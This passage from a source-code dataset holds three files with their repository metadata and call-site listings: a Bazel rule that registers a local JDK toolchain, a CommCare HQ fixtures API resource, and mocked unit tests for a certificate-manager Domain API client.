_local_java_repository_impl(repository_ctx): """Repository rule local_java_repository implementation. Args: repository_ctx: repository context """ java_home = repository_ctx.attr.java_home java_home_path = repository_ctx.path(java_home) if not java_home_path.exists: fail('The path indicated by the "java_home" attribute "%s" (absolute: "%s") ' + "does not exist." % (java_home, str(java_home_path))) repository_ctx.file( "WORKSPACE", "# DO NOT EDIT: automatically generated WORKSPACE file for local_java_repository\n" + "workspace(name = \"{name}\")\n".format(name = repository_ctx.name), ) extension = ".exe" if repository_ctx.os.name.lower().find("windows") != -1 else "" java_bin = java_home_path.get_child("bin").get_child("java" + extension) if not java_bin.exists: # Java binary does not exist repository_ctx.file( "BUILD.bazel", _NOJDK_BUILD_TPL.format( local_jdk = repository_ctx.name, java_binary = "bin/java" + extension, java_home = java_home, ), False, ) return # Detect version version = repository_ctx.attr.version if repository_ctx.attr.version != "" else _detect_java_version(repository_ctx, java_bin) # Prepare BUILD file using "local_java_runtime" macro build_file = "" if repository_ctx.attr.build_file != None: build_file = repository_ctx.read(repository_ctx.path(repository_ctx.attr.build_file)) runtime_name = '"jdk"' if repository_ctx.attr.build_file else None local_java_runtime_macro = """ local_java_runtime( name = "%s", runtime_name = %s, java_home = "%s", version = "%s", ) """ % (repository_ctx.name, runtime_name, java_home, version) repository_ctx.file( "BUILD.bazel", 'load("@bazel_tools//tools/jdk:local_java_repository.bzl", "local_java_runtime")\n' + build_file + local_java_runtime_macro, ) # Symlink all files for file in repository_ctx.path(java_home).readdir(): repository_ctx.symlink(file, file.basename) # Build file template, when JDK does not exist _NOJDK_BUILD_TPL = '''load("@bazel_tools//tools/jdk:fail_rule.bzl", "fail_rule") fail_rule( name = "jdk", header = "Auto-Configuration Error:", message = ("Cannot find Java binary {java_binary} in {java_home}; either correct your JAVA_HOME, " + "PATH or specify Java from remote repository (e.g. " + "--java_runtime_version=remotejdk_11") ) config_setting( name = "localjdk_setting", values = {{"java_runtime_version": "{local_jdk}"}}, visibility = ["//visibility:private"], ) toolchain( name = "runtime_toolchain_definition", target_settings = [":localjdk_setting"], toolchain_type = "@bazel_tools//tools/jdk:runtime_toolchain_type", toolchain = ":jdk", ) ''' _local_java_repository_rule = repository_rule( implementation = _local_java_repository_impl, local = True, configure = True, attrs = { "java_home": attr.string(), "version": attr.string(), "build_file": attr.label(), }, ) def local_java_repository(name, java_home, version = "", build_file = None): """Registers a runtime toolchain for local JDK and creates an unregistered compile toolchain. Toolchain resolution is constrained with --java_runtime_version flag having value of the "name" or "version" parameter. Java compile toolchains are created for --java_language_version flags values between 8 and version (inclusive). Java compile toolchains use the same (local) JDK for compilation. If there is no JDK "virtual" targets are created, which fail only when actually needed. Args: name: A unique name for this rule. java_home: Location of the JDK imported. build_file: optionally BUILD file template version: optionally java version """ _local_java_repository_rule(name = name, java_home = java_home, version = version, build_file = build_file) native.register_toolchains("@" + name + "//:runtime_toolchain_definition")
[]
SEL-Columbia/commcare-hq
corehq/apps/fixtures/resources/v0_1.py
992ee34a679c37f063f86200e6df5a197d5e3ff6
from couchdbkit import ResourceNotFound from tastypie import fields as tp_f from corehq.apps.api.resources import JsonResource from corehq.apps.api.resources.v0_1 import ( CustomResourceMeta, RequirePermissionAuthentication, ) from corehq.apps.api.util import get_object_or_not_exist from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType from corehq.apps.users.models import Permissions def convert_fdt(fdi): try: fdt = FixtureDataType.get(fdi.data_type_id) fdi.fixture_type = fdt.tag return fdi except ResourceNotFound: return fdi class FixtureResource(JsonResource): type = "fixture" fields = tp_f.DictField(attribute='try_fields_without_attributes', readonly=True, unique=True) # when null, that means the ref'd fixture type was not found fixture_type = tp_f.CharField(attribute='fixture_type', readonly=True, null=True) id = tp_f.CharField(attribute='_id', readonly=True, unique=True) def obj_get(self, bundle, **kwargs): return convert_fdt(get_object_or_not_exist( FixtureDataItem, kwargs['pk'], kwargs['domain'])) def obj_get_list(self, bundle, **kwargs): domain = kwargs['domain'] parent_id = bundle.request.GET.get("parent_id", None) parent_ref_name = bundle.request.GET.get("parent_ref_name", None) references = bundle.request.GET.get("references", None) child_type = bundle.request.GET.get("child_type", None) type_id = bundle.request.GET.get("fixture_type_id", None) type_tag = bundle.request.GET.get("fixture_type", None) if parent_id and parent_ref_name and child_type and references: parent_fdi = FixtureDataItem.get(parent_id) fdis = list( FixtureDataItem.by_field_value( domain, child_type, parent_ref_name, parent_fdi.fields_without_attributes[references]) ) elif type_id or type_tag: type_id = type_id or FixtureDataType.by_domain_tag( domain, type_tag).one() fdis = list(FixtureDataItem.by_data_type(domain, type_id)) else: fdis = list(FixtureDataItem.by_domain(domain)) return [convert_fdt(fdi) for fdi in fdis] or [] class Meta(CustomResourceMeta): authentication = RequirePermissionAuthentication(Permissions.edit_apps) object_class = FixtureDataItem resource_name = 'fixture' limit = 0
[((24, 13, 25, 55), 'tastypie.fields.DictField', 'tp_f.DictField', (), '', True, 'from tastypie import fields as tp_f\n'), ((27, 19, 28, 44), 'tastypie.fields.CharField', 'tp_f.CharField', (), '', True, 'from tastypie import fields as tp_f\n'), ((29, 9, 29, 68), 'tastypie.fields.CharField', 'tp_f.CharField', (), '', True, 'from tastypie import fields as tp_f\n'), ((15, 14, 15, 51), 'corehq.apps.fixtures.models.FixtureDataType.get', 'FixtureDataType.get', ({(15, 34, 15, 50): 'fdi.data_type_id'}, {}), '(fdi.data_type_id)', False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((61, 25, 61, 79), 'corehq.apps.api.resources.v0_1.RequirePermissionAuthentication', 'RequirePermissionAuthentication', ({(61, 57, 61, 78): 'Permissions.edit_apps'}, {}), '(Permissions.edit_apps)', False, 'from corehq.apps.api.resources.v0_1 import CustomResourceMeta, RequirePermissionAuthentication\n'), ((32, 27, 33, 60), 'corehq.apps.api.util.get_object_or_not_exist', 'get_object_or_not_exist', ({(33, 12, 33, 27): 'FixtureDataItem', (33, 29, 33, 41): "kwargs['pk']", (33, 43, 33, 59): "kwargs['domain']"}, {}), "(FixtureDataItem, kwargs['pk'], kwargs['domain'])", False, 'from corehq.apps.api.util import get_object_or_not_exist\n'), ((45, 25, 45, 55), 'corehq.apps.fixtures.models.FixtureDataItem.get', 'FixtureDataItem.get', ({(45, 45, 45, 54): 'parent_id'}, {}), '(parent_id)', False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((47, 16, 49, 69), 'corehq.apps.fixtures.models.FixtureDataItem.by_field_value', 'FixtureDataItem.by_field_value', ({(48, 20, 48, 26): 'domain', (48, 28, 48, 38): 'child_type', (48, 40, 48, 55): 'parent_ref_name', (49, 20, 49, 68): 'parent_fdi.fields_without_attributes[references]'}, {}), '(domain, child_type, parent_ref_name,\n parent_fdi.fields_without_attributes[references])', False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((54, 24, 54, 69), 'corehq.apps.fixtures.models.FixtureDataItem.by_data_type', 'FixtureDataItem.by_data_type', ({(54, 53, 54, 59): 'domain', (54, 61, 54, 68): 'type_id'}, {}), '(domain, type_id)', False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((56, 24, 56, 57), 'corehq.apps.fixtures.models.FixtureDataItem.by_domain', 'FixtureDataItem.by_domain', ({(56, 50, 56, 56): 'domain'}, {}), '(domain)', False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n'), ((52, 33, 53, 33), 'corehq.apps.fixtures.models.FixtureDataType.by_domain_tag', 'FixtureDataType.by_domain_tag', ({(53, 16, 53, 22): 'domain', (53, 24, 53, 32): 'type_tag'}, {}), '(domain, type_tag)', False, 'from corehq.apps.fixtures.models import FixtureDataItem, FixtureDataType\n')]
broadinstitute/cert_manager_api
tests/test_domain.py
3a9c3445ff32ecd29ab47e7a049c47155b72614a
# -*- coding: utf-8 -*- """Define the cert_manager.domain.Domain unit tests.""" # Don't warn about things that happen as that is part of unit testing # pylint: disable=protected-access # pylint: disable=no-member import json from requests.exceptions import HTTPError from testtools import TestCase import responses from cert_manager.domain import Domain, DomainCreationResponseError from .lib.testbase import ClientFixture class TestDomain(TestCase): # pylint: disable=too-few-public-methods """Serve as a Base class for all tests of the Domain class.""" def setUp(self): # pylint: disable=invalid-name """Initialize the class.""" # Call the inherited setUp method super().setUp() # Make sure the Client fixture is created and setup self.cfixt = self.useFixture(ClientFixture()) self.client = self.cfixt.client self.api_url = f"{self.cfixt.base_url}/domain/v1" # Setup a test response one would expect normally self.valid_response = [ {"id": 1234, "name": "example.com"}, {"id": 4321, "name": "*.example.com"}, {"id": 4322, "name": "subdomain.example.com"}, ] # Setup a test response for getting a specific Domain self.valid_individual_response = self.valid_response[0] self.valid_individual_response["status"] = "Active" # Setup JSON to return in an error self.error_response = {"description": "domain error"} class TestInit(TestDomain): """Test the class initializer.""" @responses.activate def test_param(self): """The URL should change if api_version is passed as a parameter.""" # Set a new version version = "v3" api_url = f"{self.cfixt.base_url}/domain/{version}" # Setup the mocked response responses.add(responses.GET, api_url, json=self.valid_response, status=200) domain = Domain(client=self.client, api_version=version) data = domain.all() # Verify all the query information self.assertEqual(len(responses.calls), 1) self.assertEqual(responses.calls[0].request.url, api_url) self.assertEqual(data, self.valid_response) def test_need_client(self): """The class should raise an exception without a client parameter.""" self.assertRaises(TypeError, Domain) class TestAll(TestDomain): """Test the .all method.""" @responses.activate def test_cached(self): """The function should return all the data, but should not query the API twice.""" # Setup the mocked response responses.add(responses.GET, self.api_url, json=self.valid_response, status=200) domain = Domain(client=self.client) data = domain.all() data = domain.all() # Verify all the query information # There should only be one call the first time "all" is called. # Due to pagination, this is only guaranteed as long as the number of # entries returned is less than the page size self.assertEqual(len(responses.calls), 1) self.assertEqual(responses.calls[0].request.url, self.api_url) self.assertEqual(data, self.valid_response) @responses.activate def test_forced(self): """The function should return all the data, but should query the API twice.""" # Setup the mocked response responses.add(responses.GET, self.api_url, json=self.valid_response, status=200) domain = Domain(client=self.client) data = domain.all() data = domain.all(force=True) # Verify all the query information # There should only be one call the first time "all" is called. # Due to pagination, this is only guaranteed as long as the number of # entries returned is less than the page size self.assertEqual(len(responses.calls), 2) self.assertEqual(responses.calls[0].request.url, self.api_url) self.assertEqual(responses.calls[1].request.url, self.api_url) self.assertEqual(data, self.valid_response) @responses.activate def test_bad_http(self): """The function should raise an HTTPError exception if domains cannot be retrieved from the API.""" # Setup the mocked response responses.add(responses.GET, self.api_url, json=self.error_response, status=400) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.all) # Verify all the query information self.assertEqual(len(responses.calls), 1) self.assertEqual(responses.calls[0].request.url, self.api_url) class TestFind(TestDomain): """Test the .find method.""" @responses.activate def test_no_params(self): """Without parameters, the method will return all domains""" # Setup the mocked response responses.add(responses.GET, self.api_url, json=self.valid_response, status=200) domain = Domain(client=self.client) data = domain.find() self.assertEqual(data, self.valid_response) @responses.activate def test_params(self): """Parameters will be passed to API""" # Setup the mocked response responses.add(responses.GET, self.api_url, json=self.valid_response[0], status=200) api_url = f"{self.api_url}?name=example.com" domain = Domain(client=self.client) data = domain.find(name="example.com") # Verify all the query information self.assertEqual(responses.calls[0].request.url, api_url) self.assertEqual(data, self.valid_response[0]) @responses.activate def test_bad_http(self): """The function should raise an HTTPError exception if domains cannot be retrieved from the API.""" # Setup the mocked response responses.add(responses.GET, self.api_url, json=self.error_response, status=400) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.find) # Verify all the query information self.assertEqual(len(responses.calls), 1) self.assertEqual(responses.calls[0].request.url, self.api_url) class TestCount(TestDomain): """Test the .count method.""" @responses.activate def test_no_params(self): """Without parameters, the method will count all domains""" # Setup the mocked response count = {"count": len(self.valid_response)} api_url = f"{self.api_url}/count" responses.add(responses.GET, api_url, json=count, status=200) domain = Domain(client=self.client) data = domain.count() self.assertEqual(data, count) self.assertEqual(responses.calls[0].request.url, api_url) @responses.activate def test_params(self): """Parameters will be passed to API""" # Setup the mocked response count = {"count": len(self.valid_response[0])} api_url = f"{self.api_url}/count" responses.add(responses.GET, api_url, json=count, status=200) domain = Domain(client=self.client) data = domain.count(name="example.com") # Verify all the query information self.assertEqual(responses.calls[0].request.url, f"{api_url}?name=example.com") self.assertEqual(data, count) @responses.activate def test_bad_http(self): """The function should raise an HTTPError exception if counts cannot be retrieved from the API.""" # Setup the mocked response api_url = f"{self.api_url}/count" responses.add(responses.GET, api_url, json=self.error_response, status=400) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.count) # Verify all the query information self.assertEqual(len(responses.calls), 1) self.assertEqual(responses.calls[0].request.url, api_url) class TestGet(TestDomain): """Test the .get method.""" @responses.activate def test_need_domain_id(self): """The function should raise an exception without an domain_id parameter.""" domain = Domain(client=self.client) self.assertRaises(TypeError, domain.get) @responses.activate def test_domain_id(self): """The function should return data about the specified Domain ID.""" domain_id = 1234 api_url = f"{self.api_url}/{str(domain_id)}" # Setup the mocked response responses.add(responses.GET, api_url, json=self.valid_individual_response, status=200) domain = Domain(client=self.client) data = domain.get(domain_id) self.assertEqual(len(responses.calls), 1) self.assertEqual(responses.calls[0].request.url, api_url) self.assertEqual(data, self.valid_individual_response) @responses.activate def test_ne_domain_id(self): """The function should raise an HTTPError exception if the specified Domain ID does not exist.""" domain_id = 2345 api_url = f"{self.api_url}/{str(domain_id)}" # Setup the mocked response responses.add(responses.GET, api_url, status=404) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.get, domain_id) class TestCreate(TestDomain): """Test the .create method.""" @responses.activate def test_need_params(self): """ The function should raise an exception when called without required parameters. """ domain = Domain(client=self.client) # Not going to check every permutation of missing parameters, # but verify that something is required self.assertRaises(TypeError, domain.create) @responses.activate def test_create_success(self): """ The function should return the created domain ID, as well as add all parameters to the request body """ # Setup the mocked response domain_id = 1234 org_id = 4321 types = ["SSL"] location = f"{self.api_url}/{str(domain_id)}" responses.add(responses.POST, self.api_url, headers={"Location": location}, status=201) domain = Domain(client=self.client) post_data = { "name": "sub2.example.com", "delegations": [{"orgId": org_id, "certTypes": types}] } response = domain.create("sub2.example.com", org_id, types) self.assertEqual(response, {"id": domain_id}) self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8")) @responses.activate def test_create_success_optional_params(self): """ The function should return the created domain ID when additional params are specified, as well add the non-required parameters to the request body """ # Setup the mocked response domain_id = 1234 location = f"{self.api_url}/{str(domain_id)}" responses.add(responses.POST, self.api_url, headers={"Location": location}, status=201) domain = Domain(client=self.client) post_data = { "name": "sub2.example.com", "delegations": [{"orgId": 4321, "certTypes": ["SSL"]}], "description": "Example sub domain" } response = domain.create("sub2.example.com", 4321, ["SSL"], description="Example sub domain") self.assertEqual(response, {"id": domain_id}) self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8")) @responses.activate def test_create_failure_http_error(self): """ The function should return an error code and description if the Domain creation failed. """ # Setup the mocked response responses.add(responses.POST, self.api_url, json=self.error_response, status=400) domain = Domain(client=self.client) create_args = { "name": "sub2.example.com", "org_id": 4321, "cert_types": ["other"] } self.assertRaises(ValueError, domain.create, **create_args) @responses.activate def test_create_failure_http_status_unexpected(self): """ The function should return an error code and description if the Domain creation failed with DomainCreationResponseError (unexpected HTTP status code). """ # Setup the mocked response responses.add(responses.POST, self.api_url, json=self.error_response, status=200) domain = Domain(client=self.client) create_args = { "name": "sub2.example.com", "org_id": 4321, "cert_types": ["SSL"] } self.assertRaises(DomainCreationResponseError, domain.create, **create_args) @responses.activate def test_create_failure_missing_location_header(self): """ The function should return an error code and description if the Domain creation failed with DomainCreationResponseError (no Location header in response). """ # Setup the mocked response responses.add(responses.POST, self.api_url, status=201) domain = Domain(client=self.client) create_args = { "name": "sub2.example.com", "org_id": 4321, "cert_types": ["SSL"] } self.assertRaises(DomainCreationResponseError, domain.create, **create_args) @responses.activate def test_create_failure_domain_id_not_found(self): """ The function should return an error code and description if the Domain creation failed with DomainCreationResponseError (Domain ID not found in response). """ # Setup the mocked response responses.add(responses.POST, self.api_url, headers={"Location": "not a url"}, status=201) domain = Domain(client=self.client) create_args = { "name": "sub2.example.com", "org_id": 4321, "cert_types": ["SSL"] } self.assertRaises(DomainCreationResponseError, domain.create, **create_args) class TestDelete(TestDomain): """Test the .delete method.""" @responses.activate def test_need_params(self): """ The function should raise an exception when called without required parameters. """ domain = Domain(client=self.client) # missing domain_id self.assertRaises(TypeError, domain.delete) @responses.activate def test_delete_success(self): """The function should return True if the deletion succeeded.""" domain_id = 1234 api_url = f"{self.api_url}/{str(domain_id)}" # Setup the mocked response responses.add(responses.DELETE, api_url, status=200) domain = Domain(client=self.client) response = domain.delete(domain_id) self.assertEqual(True, response) @responses.activate def test_delete_failure_http_error(self): """ The function should raise an HTTPError exception if the deletion failed. """ domain_id = 1234 api_url = f"{self.api_url}/{str(domain_id)}" # Setup the mocked response responses.add(responses.DELETE, api_url, status=404) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.delete, domain_id) class TestActivate(TestDomain): """Test the .activate method.""" @responses.activate def test_need_params(self): """ The function should raise an exception when called without required parameters. """ domain = Domain(client=self.client) # missing domain_id self.assertRaises(TypeError, domain.activate) @responses.activate def test_activate_success(self): """The function should return True if the activation succeeded.""" domain_id = 1234 api_url = f"{self.api_url}/{str(domain_id)}/activate" # Setup the mocked response responses.add(responses.PUT, api_url, status=200) domain = Domain(client=self.client) response = domain.activate(domain_id) self.assertEqual(True, response) @responses.activate def test_activate_failure_http_error(self): """ The function should raise an HTTPError exception if the deletion failed. """ domain_id = 1234 api_url = f"{self.api_url}/{str(domain_id)}/activate" # Setup the mocked response responses.add(responses.PUT, api_url, status=404) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.activate, domain_id) class TestSuspend(TestDomain): """Test the .suspend method.""" @responses.activate def test_need_params(self): """ The function should raise an exception when called without required parameters. """ domain = Domain(client=self.client) # missing domain_id self.assertRaises(TypeError, domain.suspend) @responses.activate def test_suspend_success(self): """The function should return True if the suspension succeeded.""" domain_id = 1234 api_url = f"{self.api_url}/{str(domain_id)}/suspend" # Setup the mocked response responses.add(responses.PUT, api_url, status=200) domain = Domain(client=self.client) response = domain.suspend(domain_id) self.assertEqual(True, response) @responses.activate def test_suspend_failure_http_error(self): """ The function should raise an HTTPError exception if the suspension failed. """ domain_id = 1234 api_url = f"{self.api_url}/{str(domain_id)}/suspend" # Setup the mocked response responses.add(responses.PUT, api_url, status=404) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.suspend, domain_id) class TestDelegate(TestDomain): """Test the .delegate method.""" @responses.activate def test_need_params(self): """ The function should raise an exception when called without required parameters. """ domain = Domain(client=self.client) # missing domain_id self.assertRaises(TypeError, domain.delegate) @responses.activate def test_delegate_success(self): """The function should return True if the delegation succeeded.""" domain_id = 1234 org_id = 4321 types = ["SSL"] api_url = f"{self.api_url}/{str(domain_id)}/delegation" # Setup the mocked response responses.add(responses.POST, api_url, status=200) domain = Domain(client=self.client) response = domain.delegate(domain_id, org_id, types) post_data = { "orgId": org_id, "certTypes": types } self.assertEqual(True, response) self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8")) @responses.activate def test_delegate_failure_http_error(self): """The function should raise an HTTPError exception if the delegation failed.""" domain_id = 1234 org_id = 4321 types = ["SSL"] api_url = f"{self.api_url}/{str(domain_id)}/delegation" # Setup the mocked response responses.add(responses.POST, api_url, status=404) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.delegate, domain_id, org_id, types) class TestRemoveDelegation(TestDomain): """Test the .remove_delegation method.""" @responses.activate def test_need_params(self): """ The function should raise an exception when called without required parameters. """ domain = Domain(client=self.client) # missing domain_id self.assertRaises(TypeError, domain.remove_delegation) @responses.activate def test_remove_delegation_success(self): """The function should return True if the delegation removal succeeded.""" domain_id = 1234 org_id = 4321 types = ["SSL"] api_url = f"{self.api_url}/{str(domain_id)}/delegation" # Setup the mocked response responses.add(responses.DELETE, api_url, status=200) domain = Domain(client=self.client) response = domain.remove_delegation(domain_id, org_id, types) post_data = { "orgId": org_id, "certTypes": types } self.assertEqual(True, response) self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8")) @responses.activate def test_remove_delegation_failure_http_error(self): """The function should raise an HTTPError exception if the delegation removal failed.""" domain_id = 1234 org_id = 4321 types = ["SSL"] api_url = f"{self.api_url}/{str(domain_id)}/delegation" # Setup the mocked response responses.add(responses.DELETE, api_url, status=404) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.remove_delegation, domain_id, org_id, types) class TestApproveDelegation(TestDomain): """Test the .approve_delegation method.""" @responses.activate def test_need_params(self): """ The function should raise an exception when called without required parameters. """ domain = Domain(client=self.client) # missing domain_id self.assertRaises(TypeError, domain.approve_delegation) @responses.activate def test_approve_delegation_success(self): """The function should return True if the approval succeeded.""" domain_id = 1234 org_id = 4321 api_url = f"{self.api_url}/{str(domain_id)}/delegation/approve" # Setup the mocked response responses.add(responses.POST, api_url, status=200) domain = Domain(client=self.client) response = domain.approve_delegation(domain_id, org_id) post_data = { "orgId": org_id, } self.assertEqual(True, response) self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8")) @responses.activate def test_approval_failure_http_error(self): """The function should raise an HTTPError exception if the approval failed.""" domain_id = 1234 org_id = 4321 api_url = f"{self.api_url}/{str(domain_id)}/delegation/approve" # Setup the mocked response responses.add(responses.POST, api_url, status=404) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.approve_delegation, domain_id, org_id) class TestRejectDelegation(TestDomain): """Test the .reject_delegation method.""" @responses.activate def test_need_params(self): """ The function should raise an exception when called without required parameters. """ domain = Domain(client=self.client) # missing domain_id self.assertRaises(TypeError, domain.reject_delegation) @responses.activate def test_reject_delegation_success(self): """The function should return True if the rejection succeeded.""" domain_id = 1234 org_id = 4321 api_url = f"{self.api_url}/{str(domain_id)}/delegation/reject" # Setup the mocked response responses.add(responses.POST, api_url, status=200) domain = Domain(client=self.client) response = domain.reject_delegation(domain_id, org_id) post_data = { "orgId": org_id, } self.assertEqual(True, response) self.assertEqual(responses.calls[0].request.body, json.dumps(post_data).encode("utf8")) @responses.activate def test_reject_failure_http_error(self): """The function should raise an HTTPError exception if the rejection failed.""" domain_id = 1234 org_id = 4321 api_url = f"{self.api_url}/{str(domain_id)}/delegation/reject" # Setup the mocked response responses.add(responses.POST, api_url, status=404) domain = Domain(client=self.client) self.assertRaises(HTTPError, domain.reject_delegation, domain_id, org_id)
[((59, 8, 59, 83), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((61, 17, 61, 64), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((82, 8, 82, 88), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((84, 17, 84, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((100, 8, 100, 88), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((102, 17, 102, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((119, 8, 119, 88), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((121, 17, 121, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((136, 8, 136, 88), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((138, 17, 138, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((147, 8, 147, 91), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((150, 17, 150, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((162, 8, 162, 88), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((164, 17, 164, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((181, 8, 181, 69), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((183, 17, 183, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((195, 8, 195, 69), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((197, 17, 197, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((209, 8, 209, 83), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((211, 17, 211, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((226, 17, 226, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((237, 8, 237, 94), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((239, 17, 239, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((254, 8, 254, 57), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((256, 17, 256, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((270, 17, 270, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((287, 8, 287, 95), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((289, 17, 289, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((309, 8, 309, 95), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((311, 17, 311, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((330, 8, 331, 33), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((333, 17, 333, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((351, 8, 352, 33), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((354, 17, 354, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((372, 8, 372, 63), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((374, 17, 374, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((392, 8, 392, 98), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((394, 17, 394, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((414, 17, 414, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((426, 8, 426, 60), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((428, 17, 428, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((444, 8, 444, 60), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((446, 17, 446, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((461, 17, 461, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((473, 8, 473, 57), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((475, 17, 475, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((491, 8, 491, 57), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((493, 17, 493, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((508, 17, 508, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((520, 8, 520, 57), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((522, 17, 522, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((538, 8, 538, 57), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((540, 17, 540, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((555, 17, 555, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((569, 8, 569, 58), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((571, 17, 571, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((591, 8, 591, 58), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((593, 17, 593, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((608, 17, 608, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((622, 8, 622, 60), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((624, 17, 624, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((644, 8, 644, 60), 'responses.add', 'responses.add', (), '', False, 'import responses\n'), ((646, 17, 646, 43), 'cert_manager.domain.Domain', 'Domain', (), '', False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((661, 17, 661, 43), 'cert_manager.domain.Domain', 'Domain', (), '', 